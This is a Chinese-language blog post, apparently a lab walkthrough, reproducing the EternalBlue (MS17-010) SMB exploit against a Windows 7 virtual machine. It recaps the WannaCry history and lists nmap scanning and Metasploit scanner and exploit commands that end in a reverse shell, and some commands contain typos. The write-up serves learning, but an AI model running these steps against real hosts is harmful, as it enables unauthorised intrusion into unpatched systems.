永恒之蓝漏洞复现

发布于 2020-07-28  13 次阅读


基础知识

1.何为永恒之蓝漏洞 根据百度百科显示永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。 5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。被袭击的设备被锁定,并索要300美元比特币赎金。要求尽快支付勒索赎金,否则将删除文件,甚至提出半年后如果还没支付的穷人可以参加免费解锁的活动。原来以为这只是个小范围的恶作剧式的勒索软件,没想到该勒索软件大面积爆发,许多高校学生中招,愈演愈烈。

环境准备

在VMware下搭建window7旗舰版+kali linux系统 kali内核信息如下

首先ifconfig获取kali的ip信息

然后namp扫描同网段的主机信息和系统版本,确保靶机开放了445端口

root@kali ~:namp 192.168.91.0/24 

扫描结果如下

可以看出这个192.168.91.129就是我们这次的攻击目标了

接下来载入msf模块

root@kail ~:msfconsole
#搜索msfkali漏洞库
msf5> search dos
#搜索ms17_010
msf5> search ms17_010

这里可以得到两个工具,其中auxiliary/scanner/smb/smb_ms17_010是永恒之蓝扫描模块,exploit/windows/smb/ms17_010_eternalblue是永恒之蓝攻击代码,一般配合使用,前者先扫描,若显示有漏洞,再进行攻击。

使用ms17-010扫描模块,对靶机Win7进行扫描

#使用模块
msf5> use auxiliary/scanner/smb/smb_ms17_010
#设置目标ip或网段
msf5>auxiliary(scanner/smb/smb_ms17_010) > set RHOSTS 192.168.91.129
#执行扫描
msf5>auxiliary(scanner/smb/smb_ms17_010) > run

使用ms17-010攻击模块,对靶机Win7进行攻击

#使用模块
msf> use exploit/windows/smb/ms17_010_eternalblue
#设置攻击目标ip
msf exploit(windows/smb/ms17_010_eternalblue) > set RHOST192.168.91.129
#执行攻击
msfexploit(windows/smb/ms17_010_eternalblue) > exploit

直接反弹出windows7的shell 接下来就可以进行提权等一系列恶意命令